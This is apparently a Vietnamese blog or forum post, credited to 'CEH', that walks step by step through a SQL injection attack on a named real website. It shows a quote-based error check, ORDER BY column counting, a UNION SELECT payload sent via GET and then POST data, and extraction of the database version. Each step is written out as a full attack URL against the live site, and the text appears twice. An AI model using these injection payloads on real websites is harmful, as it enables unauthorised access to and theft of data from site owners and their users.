Bài liên quan
Đầu tiên chúng ta cùng nhìn site này
Bước 1: Check lỗi
![[Hình: data487c4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uOv6VdNkPMMk4jIX9yHnxbxOgy83xpJQPa4H0YzJDxsAp_BfqPWaAu5oKC4eARPJZy1tKU9bcXZ28_-vuceD4Cb18yiGluePQa53VOlRehcrwjA8VFh1jHm8VJ=s0-d)
Bước 2: Tìm số trường cột
![[Hình: data2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sb1U4-x5GCFL-QYNs8Q6MMTw8ZJUDTiHsW8h5Wwg-8Woc5qCOoIXfypI9rgeh1bES5CZdEiqNa6tx0X0aKJ_74HmecTeo7SzRDjhiHp5dQscybV0LEy4w=s0-d)
![[Hình: data1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_stWzljaUPs4_O_xNm9bnnxhAWcbm20wy_Y4nfb0z_VXv57hiyTCZW2KjoWif4oABjgvkvQgUdVS0tZhX9h82M77NBfvkhMX9ZbyWDrgRdV2-WYrR6wTv8=s0-d)
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
![[Hình: data3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udodclLTPf0xhLqgR3joRvkhBU8_FkC66hS7JpaUvks5mCrJz69_zbUu6ArqOj1onA-Bb5qaCY4NiEzU19sQn5kkWkyEahWdB82xftOoDiWMVAc4zthR0=s0-d)
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uN4eST75Cosca19jF1MgOtnG-c7orhMv8xPJRyM_NrI6BJNYsHgFm2ZsL2XuEWvft49tmI3Nif2awMgq-dtLzB1t8h1-AFFFfxQWGXfDyu-3xn6LvqyOs=s0-d)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sLDqR9tNz4vXUbxvBgZVnGjgF9fAFjOvP9d032QgpqR3RtFu9dDBnLfOAE8fgSDHdQWMqQslq8WUSIKWX0uCyM_QYBubAxw6r_oFD_4uhD-WYtp0r10Hs=s0-d)
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tBAA4vQaIsNag4mqc_dsDhklzmJRlQjd5Uaa3h9oM3UAGrLbFPzdhvMhOr1uFzFuylfmvXJNw1-Dfs-f1iJKpAye4anCumtcDwNyOBc3xp5CVDdXC6GpI=s0-d)
....
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 Bước 1: Check lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206' ![[Hình: data487c4.png]](http://www.upsieutoc.com/images/2014/06/08/data487c4.png)
Giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 2-- - ![[Hình: data2.jpg]](http://www.upsieutoc.com/images/2014/06/08/data2.jpg)
Giao diện website vẫn bình thường
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 3-- - ![[Hình: data1.jpg]](http://www.upsieutoc.com/images/2014/06/08/data1.jpg)
Giao diện website thay đổi
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 and 0 UNION SELECT 1,2-- - ![[Hình: data3.jpg]](http://www.upsieutoc.com/images/2014/06/08/data3.jpg)
Không tìm thấy cột lỗi
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](http://www.upsieutoc.com/images/2014/06/08/data6.jpg)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](http://www.upsieutoc.com/images/2014/06/08/data4.jpg)
Lỗi cột 1
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](http://www.upsieutoc.com/images/2014/06/08/data5.jpg)
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Post a Comment